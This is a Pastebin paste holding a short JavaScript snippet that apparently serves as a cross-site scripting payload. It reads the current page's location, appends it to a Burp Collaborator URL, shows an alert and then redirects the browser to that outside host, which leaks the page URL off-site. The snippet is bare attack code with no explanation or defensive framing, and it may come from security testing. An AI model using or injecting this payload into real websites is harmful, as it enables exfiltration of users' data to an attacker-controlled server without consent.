Advertisement
Guest User

Untitled

a guest
Jan 17th, 2019
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. var bla = document.location
  2. var theUrl= "http://5synvv29kgnhgczbx7xymg3eb5hv5k.burpcollaborator.net" + "?" +bla ;
  3. function httpGet(theUrl)
  4. {
  5. var xmlHttp = new XMLHttpRequest();
  6. xmlHttp.open( "GET", theUrl, false ); // false for synchronous request
  7. xmlHttp.send( null );
  8. return xmlHttp.responseText;
  9. }
  10. alert(theUrl)
  11. window.location.replace(theUrl)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement